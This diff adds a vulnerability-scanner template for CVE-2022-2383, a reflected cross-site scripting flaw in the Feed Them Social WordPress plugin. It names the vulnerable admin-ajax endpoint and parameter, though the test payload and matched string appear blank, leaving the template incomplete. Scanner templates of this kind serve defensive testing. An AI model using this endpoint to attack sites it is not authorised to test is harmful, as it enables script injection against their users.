diff --git a/cves/2022/CVE-2022-2383.yaml b/cves/2022/CVE-2022-2383.yaml
new file mode 100644
index 0000000000..027da7cff5
--- /dev/null
+++ b/cves/2022/CVE-2022-2383.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-2383
+
+info:
+ name: Feed Them Social < 3.0.1 - Cross-Site Scripting
+ author: akincibor
+ severity: medium
+ description: |
+ The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+ reference:
+ - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
+ classification:
+ cve-id: CVE-2022-2383
+ metadata:
+ verified: true
+ tags: xss,wp,wordpress,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in='
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '
'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200